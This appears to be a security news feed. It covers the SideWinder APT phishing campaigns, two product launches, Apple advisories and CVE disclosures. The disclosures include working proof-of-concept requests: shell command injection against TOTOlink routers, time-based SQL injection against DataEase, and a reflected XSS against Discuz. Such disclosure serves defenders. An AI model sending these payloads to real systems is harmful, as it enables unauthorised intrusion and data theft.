The nation-state threat group has been attacking a wider range of victims and regions than previously thought.

Researchers have linked the slippery SideWinder APT to two malicious campaigns — one in 2020 and one in 2021 — that add more volume to an attack spree attributed to the prolific threat actor over the past several years and demonstrate how extensive its arsenal of tactics and tools really is.

A report published this week by Group-IB links SideWinder (aka Rattlesnake or T-APT4) to a known 2020 attack on the Maldivian government, as well as a previously unknown series of phishing operations that targeted organizations in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka between June and November 2021.

The findings show the group casting a far wider net than previously thought using a trove of tools, including previously unidentified remote access Trojans (RATs), backdoors, reverse shells, and stagers. Researchers' investigation of these attacks also links the group to other known APTs, including Baby Elephant — which may in fact be SideWinder itself — and Donot APT, they said.

The report also sheds more light on the geographically dispersed nature of the group's operations, with researchers uncovering IP addresses controlled by SideWinder located in the Netherlands, Germany, France, Moldova, and Russia, the researchers said.

SideWinder, active since 2012, was detected by Kaspersky in the first quarter of 2018 and thought to primarily target Pakistani military infrastructure. However, this latest report shows that the target range of the group — widely believed to be associated with Indian espionage interests — is far broader than that.

"SideWinder has been systematically attacking government organizations in South and East Asia for espionage purposes for about 10 years," Dmitry Kupin, a senior malware analyst on Group-IB's Threat Intelligence team, wrote in the report.

Specifically, researchers identified more than 60 targets — including government bodies, military organizations, law enforcement agencies, central banks, telecoms, media, political organizations, and more — of the newly identified phishing campaign. The targets are located in several countries, including Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka.

**Sophisticated Phishing Resources**

The phishing attacks — in which SideWinder impersonates known entities in an attempt to lure victims — also demonstrated how vast its phishing infrastructure is, the researchers said. This makes sense, as spear-phishing has long been the group's initial-access method, they said.

The phishing findings, which did not confirm whether SideWinder was successful in its attempts to compromise victims, also reveal something previously unknown about the group: an interest in targeting cryptocurrency.

In the phishing attacks between June 2021 and November 2021, the group impersonated both the Central Bank of Myanmar, using a website in its arsenal that imitates the financial institution, as well as a contactless Internet of Things (IoT) payment system used in India called Nucleus Vision, also known as Nitro Network.

The campaigns also are notable because they demonstrate SideWinder trying to steal cryptocurrency by imitating an Airdrop of NCASH crypto, the researchers said. NCASH is used as a payment means in the Nucleus Vision ecosystem, which retail stores in India have been using, they said.

Specifically, researchers uncovered a phishing link related to Airdrop — an Apple technology for sending files via its mobile devices. When users visited the link (http://5\[.\]2\[.\]79\[.\]135/project/project/index.html) they were asked to register in order to participate in an Airdrop and receive tokens, though it was not specified which ones. By pressing the "Submit details" button, the user activates a script login.php, which researchers believe the group is using to further develop this attack vector.

**Tools and Telegram**

Group-IB also discovered a trove of custom tools used by SideWinder, only some of which had been described publicly before, developed in various programming languages including C++, C#, Go, Python (compiled script), and VBScript.

Part of that arsenal is the group's newest custom tool, SideWinder.AntiBot.Script, an info-stealer written in Python and used in previously documented phishing attacks against Pakistani organizations.

The script can extract a victim's browsing history from Google Chrome, credentials saved in the browser, the list of folders in the directory, as well as meta information and contents of .docx, .pdf, and .txt files. It's a key part of the group's notoriety for conducting "hundreds of espionage operations within a short span of time," Kupin wrote.

Another and perhaps the "most interesting finding" regarding SideWinder's tools arsenal were RAT samples that used the Telegram messaging app as a channel for receiving the results of malware commands and thus retrieve data stolen from compromised systems, Kupin noted.

This tactic is increasingly becoming a hallmark of many advanced threat actors, he said.

**How to Stave Off SideWinder**

The report includes a vast array of indicators of compromise as well as URLs associated with SideWinder attacks.

Because like many other APT groups SideWinder relies on targeted spear-phishing as the initial attack vector, it's important for organizations "to set up business email protection solutions that are capable of detonating malicious attachments in an isolated virtual environment," Kupin tells Dark Reading. Enterprises should also do socially engineered penetration tests so employees can quickly recognize phishing emails that reach inboxes, he adds.

Organizations at risk from SideWinder also should continuously monitor network activity within the organization's perimeter by employing managed extended detection and response (MXDR) solutions that are regularly updated with fresh network indicators and rules, Kupin says.

SideWinder APT Spotted Stealing Crypto

Thistle's technology will give device makers a way to easily integrate features for secure updates, memory management, and communications into their products, Snyder says.

Renowned security expert Window Snyder, whose experience includes helping companies such as Apple, Microsoft, and Mozilla bolster the security of their products, is betting she can do the same thing for IoT device manufacturers.

Snyder's company Thistle Technologies today is making generally available a new platform that aims to help IoT manufacturers securely deploy updates and implement capabilities for secure communications and memory management into their devices. The new Thistle Security Platform will give development teams working for embedded device manufacturers a way to directly incorporate security functionality into their products during the build phase.

**Crucial Capabilities**

Snyder says the technology is crucial because embedded devices are like fully functional computers that face the same kind of threats that operating systems and applications software do, but often don't have basic security mechanisms for protecting against them.

"What we are trying to do is democratize security," says Snyder, who launched Thistle in early 2021 after a stint as chief security officer at financial technology company Square. The goal is to give IoT and embedded device makers an infrastructure for quickly adding security functions to their devices without needing to develop it themselves. "These devices have all the same type of threats that general purpose operating systems have but with a lot less security," she says.

Thistle's set of security tools and services include an update component, a memory allocator, and an integrated memory-safe Transport Layer Security (TLS) stack for secure communications.

The update client, for Linux and Windows-based devices, enables IoT manufacturers to securely deliver signed updates to their device fleet from a single, central location. The updates could include new device features, security functions, and vulnerability fixes. It includes a failover feature that allows a device to return to a last known good state--without having to reboot—in case an update creates problems. The update client also supports vulnerability monitoring and access control capabilities. Thistle's memory allocator manages device memory in such a way as to mitigate buffer overflows and other common memory-related issues.

**Automated Updates**

When implemented, Thistle's technology will enable IoT devices to receive automated updates in much the same way that general-purpose operating systems and applications receive updates. When a vulnerability surfaces in a product, or new functionality becomes available for it, the device manufacturer then can securely push the update out centrally to all installed devices, thereby eliminating the need for manual intervention.

In her various stints as a senior security executive at some of the world's largest technology companies, Snyder has contributed to advances in areas such as secure software development lifecycles, memory management ,and attack surface reduction.

She perceives the technology her company is now bringing to the IoT market as giving resource-strapped device manufacturers a way to integrate baseline security features—such as encrypted communications and memory management capabilities—into their devices. Her hope is that device makers will then leverage her company's platform to build on those features going forward.

Thistle's immediate focus will be on IoT players in key markets such as automotive, power, water, networking, and the industrial sector.

Update mechanisms—when they exist—in the IoT space can be buggy and unreliable, Snyder says. She points to multiple incidents when a bad update bricked a device or caused other problems. One example: a 2017 incident where a bad firmware update bricked hundreds of smart locks from Lockstate that Airbnb was using as part of a program for its hosts. There have been other instances where key fobs and even cars have been bricked because of a faulty update, Snyder notes.

"The tolerance for update mechanisms is incredibly low," Snyder says. "When you have really low tolerance for update failures, you need to have an update mechanism that is highly reliable in addition to being supported."

**Integration with Build Environments**

The new Thistle security platform integrates with build environments and provides developers with tools such as those for integrating Thistle's security features into their devices and for things like signing and processing updates. Thistle's platform integrates with the open-source Yocto build system, which allows developers to add features to Linux products relatively quickly. It also integrates with the OpenWrt router operating system and with the U-Boot open-source bootloader.

Christ Wysopal, founder and chief technology officer at Veracode and seed investor in Thistle, says many of the capabilities that the company is making available are new to the space -- especially among smaller IoT device makers. The technology should help embedded device makers implement a secure by design approach where key security features get integrated into the product.

"Thistle is making it easier for people to incorporate this technology at a price point they can afford," Wysopal says. "It is changing the market by making security functionality available where it wasn't before."

Thistle's platform launch comes at a time when interest in technologies for securely updating IoT devices appears to be increasing. In recent years, vendors and security researchers have been reporting a growing number of vulnerabilities in IoT products.

A report from Claroty last year showed that in the first half of 2022, IoT vulnerabilities accounted for 15% of all vulnerabilities in the so-called Extended IoT (XIoT) compromised of all connected cyber-physical systems. In the previous six-month period, IoT vulnerabilities accounted for just 9% of all XIoT vulnerabilities.

**Pressure Mounts on Device Makers**

The trend is significant because organizations across industries such as transportation, telecommunications, manufacturing, and other sectors are connecting all sorts of embedded devices to their networks to support digital transformation and operational requirements.

"The devices have a unique profile because they are not a general-purpose computer and yet they have a processor, memory, are connected to the network and a lot of the time are doing something critical," Wysopal says.

He expects that enterprise organizations are going to increasingly demand better security capabilities from their IoT suppliers. The availability of technologies like that from Thistle is going to make it harder for device manufacturers to explain away their failure to implement fundamental security mechanisms in their products, Wysopal says.

Just this week the National Institute of Standards and Technology released a new encryption standard for IoT devices, which means enterprise organizations and consumers could soon begin expecting device makers to implement it in their products.

Measures like the Internet of Things Cybersecurity Improvement Act of 2020 are another factor because they require organizations selling IoT devices to government agencies to ensure minimum security standards for their technologies.

Embedded and IoT device makers are feeling more pressure than before to respond to security threats, Snyder says.

"Customers are also asking better questions and there have been more and more demonstrations over time that these devices are deeply vulnerable," she says.

Window Snyder's Start-up Launches Security Platform for IoT Device Makers

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取province参数下的内容传递给v11，之后将v11带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules”,
"province":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24236: ttt/19 at main · Am1ngl/ttt

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取city参数下的内容传递给v12，之后将v12带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"city":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24238: ttt/20 at main · Am1ngl/ttt

Developers don't have to build authentication and user management from scratch, and can devote their energies to the core functions of the application, instead.

Descope emerged from stealth on Wednesday with a frictionless, secure, and developer-friendly authentication and user management service.

There is always a point in application development when a decision has to be made, to either build user authentication in-house or use someone else's. It's not a one-time decision, either, since user authentication is more than just setting up a username and password. There has to be a process for password resets, a way to add layers of authentication, a mechanism to securely store credentials, and controls to detect and prevent fraud and bots. All that comes before figuring out user provisioning, tackling access control, or even incorporating single sign-on.

"Authentication is never finished for any application," wrote Slavik Markovich, co-founder and CEO of Descope.

Descope's core premise is based on a simple fact: developers should not be spending time and resources on authentication and user management if that is not the core part of the service they are building. With Descope's authentication user management platform, developers can create authentication flows, add passwordless authentication methods to their applications, manage access privileges and identities, and implement security controls to prevent account takeovers and other types of fraud – and they don't need to be security experts to have these capabilities.

“Authentication is too important to be done incorrectly, but it’s also too complicated and time-consuming to be done in-house by engineering teams,” Guru Chahal, a partner at Lightspeed Venture Partners, said in a statement.

Identity-based attacks are on the rise, which has renewed interest in passwordless technologies. The Verizon Data Breach Investigations Report found that 80% of basic web application attacks can be attributed to stolen credentials. Google and Apple have rolled out passkeys to phase out passwords and open standards like FIDO2 and WebAuthn make it easier for users to rely on their devices as an authentication factor. Descope's passwordless technology stack means organizations can make that shift to deliver a passwordless experience to users.

"Our vision is to “de-scope” authentication from every app developer’s daily work, so they can focus on business-critical initiatives without worrying about building, maintaining, or updating authentication,” Markovich said.

The platform supports different types of developers, including those who prefer no-code/low-code tools, rely on software development kits (SDKs), or prefer working with APIs. Developers can use the Descope platform without charge for up to 7,500 monthly active users for business-to-consumer (b2c) applications and up to 50 tenants for business-to-business (b2b) applications.

Descope has raised $53 million in seed funding, the company said. The founding team has worked together for years, at security orchestration, automation, and response startup Demisto, which was acquired by Palo Alto Networks in 2019, and database security company Sentrigo, which was acquired by McAfee in 2011.

Descope Handles Authentication So Developers Don't Have To

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

Apple Security Advisory 2023-02-13-3 - Safari 16.3.1 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-3 Safari 16.3.1Safari 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213638.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PMACgkQ4RjMIDkeNxmFTBAA05jcHEZOdXuE0BQKft0qoWItZ2Dg0p/ONxiqS9ihNDqBt+6q+yOORvr4Vr2iVpCpo4F5nQv/qBApGCS84SVN9rRIM1VteOYIObgpo37CceODrbywjSTHcD6GbR47ra8reQK10sDSIoQtX1XKGUltUC/RfKnVDtk/coNu7TJj/VVg2YNPOlQFc5ETie0d/NOcK+8Ds1NvK4HQ0Gfq+KHmE507T7nAMfcK4YVlZCtkz4YHEa9w9AcIgmQ4nzlOSEs5mHu2egr70Xy8+CL7i82Oh2FBzVetLkDhhrZppjykX7zK4Lc0cbABpiaIu/6ObPGhoW4sFfPCJa8NSflRLKe+aNHdyuzjuqx8rSeqFdP4+rhdI/X2Z/9VKsB/1Tch55nuBhEGZTejmdwtorGf1+otfW5XpWOGXwnE9sR0qjVvwPwfuK5noLUoLvBRfiK6xaKUG6IXEYCt0rVncJJ9QtJJKYvqhbf3OwNodrA/V9AAm2MTtIo514BkfZHtv01xOm7tv35a+5QFcoW/iJBvdTxGVCwzb+2AshMCqO9MQxt8cWknC41K0l6Fl6Yl/P0qzUJr4NoG72LwW0PqaHimWDVAqJcAHsESe/1qnLO3rZItQJByxURc4wUpHAojsFBEBtLiS7FNHOvw4bM1ylQIXXoiFD7sE9NpvksUDzNoRdyAEOM==b0uc-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-3

Apple Security Advisory 2023-02-13-2 - macOS Ventura 13.2.1 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-02-13-2 macOS Ventura 13.2.1

macOS Ventura 13.2.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213633.

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of Google  
Project Zero

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to observe unprotected user data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2023-23522: Wenchao Li and Xiaolong Bai of Alibaba Group

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

macOS Ventura 13.2.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDke  
NxkM2hAApRo7JQlaNxVVpw1y96PG2oAVygFVw+N1cpEO72L4gDjvAb7+tOBqUTkz  
Az+IizQfC2gapw9g/csghk+s+/gt16Q0iX4jDDEDypZ5So/LoaucFVTbGCy9Hns0  
T0PTS4a0KIFBHbRQ3ktrhkUp49ykqDWwWdnvM1QgtUe3HfAZQWHVnYpdsj26CTaz  
5ihA0chuzAGnx2lUZbyz8nl6f9kdqx1x8uSF0P7AkIp6L7IcZOLLO8tXnKApeC7S  
HSbafe7JKxVNPtzaI/ZuxQe9/9Kr8VUiezVCK+WvJ9akRsy4CQ022yirIOlFIEhF  
32mFq+BaQ77YTULP2us7BG8oMJ3tPxfmlykhqD4P0p4JRW6ZFoQmVKyUEPdsaALG  
NYilSR3CRSpaCbh+dunGMJshNSHRJO6NluLq1mPVB7xFSiypgJADjS95zBSINtC9  
JrKusbpICiAm8VqVC4GNltG+djft0NjbSiJXPo409X7j01Bt1ZJpk2UWTUfZbHMU  
hW90JFySoHLRcVt3Af1mbBkyaHv0GSKG+Fjul/XyBlG3U8eJVXJhWCrhMjm17GK0  
6j4HEUsAYzAg0j+Ss7QQKhwxlW3BPd+3D2kGwbPzBx/rcyVjbc456fyCLSYP58cf  
EIYmmOwF9QcH939TCxoIglHOsdAuuIilGApd2on9QWOj8QSaUFw=  
=2kFu  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-2

Apple Security Advisory 2023-02-13-1 - iOS 16.3.1 and iPadOS 16.3.1 addresses code execution and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-1 iOS 16.3.1 and iPadOS 16.3.1iOS 16.3.1 and iPadOS 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213635.KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of GoogleProject ZeroWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, iPad mini5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAdditional recognitionWe would like to acknowledge The Citizen Lab at The University ofToronto’s Munk School for their assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.3.1 and iPadOS 16.3.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDkeNxk00xAA6vBGZD0tv5wi0q4B8jiJ3oz5/Om05bfUPLziPG1MvWzcFZYpQmdS+OJWq219S6uDt0m0ojPLkUgcxQ5OmQ/ViwMbawZaVOpe6aIem33iGkWFyGhvgU7EDLwJcIaXd7pMxfkI28AZUgd8Brf/UXnt1Ja13+ixDnrGT2C+3G+kst17+PZZ0bZj+MwtxDuPW6uLDegjTmjNXzWuo/mSm2MChzoygsbUOPa0Y29OhmgRCbLu/nOCcPcWRk5iYlSZU5efZ7yqpjMdIt36TCD/yAd0uttebgnKMMLNjQjDAbPj0j+5NiAmYx75DYksYCnbs+LRMJ9Fik7lA6ihCavJwgq/PZ5NKR/xA6utkpxQatpT4Swmh2mDabJJK08GT+UsTfnxRgwPnyOEcSBAg7IaMc6BxIUiVrosp4u+ZYO0QnR6z0CgI+2zqTb+HcCjOpmCYwDz8pvyO7zZF1SdZZpc6GXsxX/Aq5FahSeWQY1x4i0qbiy0AsP7JBcMbAOStKPV14Q9UJ1iTbxI1aaLYxwWmawhN2iCnfjOc+nTC6X5gNtXSF+TRtgGUO8Wr039PgF7MqJ+24UYjf0IdD9tCRaIHBGpUwFKsHhSk/hRsGi4Yov9U5Bu1BKGvTHwx714vW6p/vjKajjiP6ljtr7TDwkq1SRPSecX3jrrAGkNoJOw+0xOW5s==RxGI-----END PGP SIGNATURE-----

Tag

#apple